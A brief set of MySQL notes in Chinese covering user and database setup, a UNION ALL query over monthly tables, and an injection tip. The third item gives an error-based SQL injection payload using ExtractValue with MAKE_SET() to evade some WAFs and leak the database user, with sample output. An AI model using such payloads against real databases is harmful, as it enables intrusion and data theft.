1.创建一个用户和一个数据库,用户拥有该数据库所有权限,全局usage权限
CREATE DATABASE owncloud; CREATE USER owncloud@localhost IDENTIFIED BY 'mysecurepassword'; GRANT ALL PRIVILEGES ON owncloud.* TO owncloud@localhost; flush privileges;
2.查询所有相同的表,并排序(table_2014xx都是相同结构的表,查询它们的全部内容,并按照每个表里的idx降序排列)
select * from (select * from table_201401 union all select * from table_201402 union all select * from table_201403 union all select * from table_201404 union all select * from table_201405 union all select * from table_201406 union all select * from table_201407 union all select * from table_201408 union all select * from table_201409 union all select * from table_201410 union all select * from table_201411) data1 order by data1.idx desc
3.mysql注入技巧:MAKE_SET()替代CONCAT()
mysql> SELECT MAKE_SET(-1,@@version,database(),user(),@@version,user(),database()); +----------------------------------------------------------------------+ | MAKE_SET(-1,@@version,database(),user(),@@version,user(),database()) | +----------------------------------------------------------------------+ | 5.1.69,u123_root,u123_root@localhost,5.1.69,u123_root@localhost,u123_root | +----------------------------------------------------------------------+ 1 row in set (0.00 sec)
有时可以绕过一些WAF,以下给予报错注入
SELECT 1 and ExtractValue(1,make_set(-1,0,user()))
回显
#1105 - XPATH syntax error: ',user123@localhost'